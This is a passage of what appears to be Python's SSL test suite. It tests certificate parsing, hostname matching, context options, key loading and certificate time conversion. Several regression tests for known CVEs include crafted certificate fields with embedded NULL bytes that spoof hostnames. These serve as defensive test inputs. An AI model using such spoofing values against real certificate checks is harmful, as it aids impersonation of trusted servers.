def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0):
default |= ssl.OP_NO_COMPRESSION
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
